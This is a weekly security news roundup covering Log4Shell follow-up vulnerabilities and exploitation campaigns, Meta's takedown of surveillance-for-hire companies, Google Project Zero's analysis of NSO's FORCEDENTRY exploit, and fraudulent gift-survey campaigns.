Log4Shell Vulnerability (update)
Through the week new details and comments around the vulnerability known as Log4Shell have continued to appear. First, a new denial-of-service vulnerability affecting Log4j2 on versions from 2.0-alpha1 to 2.16.0, was made public. The patch of this flaw, known as CVE-2021-45105 CVSSv3 7.5, has provoked the publication of the 2.17.0 version.
Also, new active exploitation campaigns have been detected, this time by the operators of the TellYouThePass and Conti ransoware, as well as by the developers of the Dridex and Meterpreter trojans. On this matter, Netlab published a report to show the data observed in their honeypots. They identified samples of over 30 malware families being distributed from IP addresses from more than 50 countries. The most notorious malware detected in this honeypots were miners such as Kinsing or Xmrig, as well as binaries from families such as Dofloo, Tsunami (aka Mushtik) or the Mirai botnet. As per the active attacks, the Belgian Ministry of Defense confirmed an attack against its systems that disrupted its activities over several days. It is believed that the vector of attack was Log4Shell exploitation. Finally, Investigators from Blumira published information on a new attack vector that allows the vulnerability to be locally exploited in servers using a Websocket connection from JavaScript.
Also this week, the Five Eyes Alliance, which includes the governments of Australia, Canada, New Zealand, United Kingdom and the United States, has published a new joint security warning include a series of recommendations for those affected by the Log4Shell flaw. In the US, the CISA has issued “log4j-scanner”, a new tool designed to scan and identify web services vulnerable to any of the two remote code execution bugs found in Log4j (CVE-2021-44228 y CVE-2021-45046), while in China the Ministry of Industry and Information Technology (MIIT) suspends their CyberThreat and Information Exchange Platform collaboration agreement with Alibaba Cloud Computing for at least six months after researchers from Alibaba failed to warn about the Log4j vulnerability before the announcement by Apache.
Know more: https://logging.apache.org/log4j/2.x/download.html
Meta takes action against surveillance-for-hire companies
Facebook’s parent company Meta has announced that after months of investigation it has removed seven companies in the surveillance-for-hire industry from its platforms for targeting victims in more than 100 countries to collect information, manipulate and compromise their devices and accounts. This activity reportedly impacted approximately 50,000 users who have been notified of malicious activity. The eliminated companies come from different countries such as China, Israel, India and North Macedonia, and are operating against their targets in three phases: recognition, through automated software, compromise, in which they seek to gain the trust of their victims, and exploitation, through the distribution of phishing with the aim of obtaining credentials. Meta points out that, although these campaigns are usually dealt with in the exploitation phase, it is essential to interrupt the life cycle of the attack in its early stages to prevent devices and user accounts from being compromised later on. Given the severity of their breaches, Meta has reported that in addition to removing these companies from its platforms, it has blocked their related infrastructure, issued cease and desist notices, notifying them that their activity has no place on the firm’s platforms, and shared its findings with researchers, other platforms and authorities for appropriate action.
All the details: https://about.fb.com/wp-content/uploads/2021/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf
Google publishes in-depth analysis of NSO’s FORCEDENTRY exploit
Google’s Project Zero team recently published an in-depth analysis of NSO Group’s FORCEDENTRY exploit, which they consider to be one of the most sophisticated exploits they have analysed, putting NSO’s tools on par with the sophistication of state-sponsored Advanced Persistent Threats (APTs). The sample, analysed in collaboration with Apple’s Security Engineering and Architecture (SEAR) team, has been selectively distributed throughout the year against activists, dissidents and journalists in different regions. FORCEDENTRY uses a zero-click or non-interaction technique, which means that victims do not need to access a link or grant specific permissions for the attack to proceed. In addition, this exploit uses a number of tactics against Apple’s iMessage platform to bypass the device’s protections, take control and install NSO’s notorious Pegasus spyware. The vulnerability leveraged by this exploit (CVE-2021-30860 CVSSv3 7.8) has been fixed since September 2021, in iOS version 14.8. This same exploit has been observed by Citizen Lab being used in an attack against a Saudi activist in which Pegasus was allegedly used in conjunction with Predator, software developed by Cytrox, one of the “on-demand surveillance” companies reported by the Meta team that have been removed from their platforms.
Learn more: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Gift survey campaigns generate $80 million a month for malicious actors
Group-IB’s research team has published research analysing that cybercrime generates approximately $80 million per month as a result of fraud schemes using giveaway surveys to collect personal and banking information. Malicious actors lure victims by using website advertising, SMS, emails and/or pop-up notifications under the pretext of winning a prize from a well-known brand by participating in a survey. Among the characteristics of these campaigns is that the infrastructure used allows malicious actors to display different content to different users, depending on certain parameters. This is because several redirects are made when accessing these links, during which information is collected from the user that will end up displaying content tailored to the victim. Furthermore, the final link is customised for the specific user, being accessible only once, complicating the detection of these malicious sites. Finally, it should be noted that these campaigns target more than 90 countries, with Europe being the most affected region, and that the number of impersonated companies exceeds 120.
All the information: https://www.group-ib.com/media/target-links-2021/
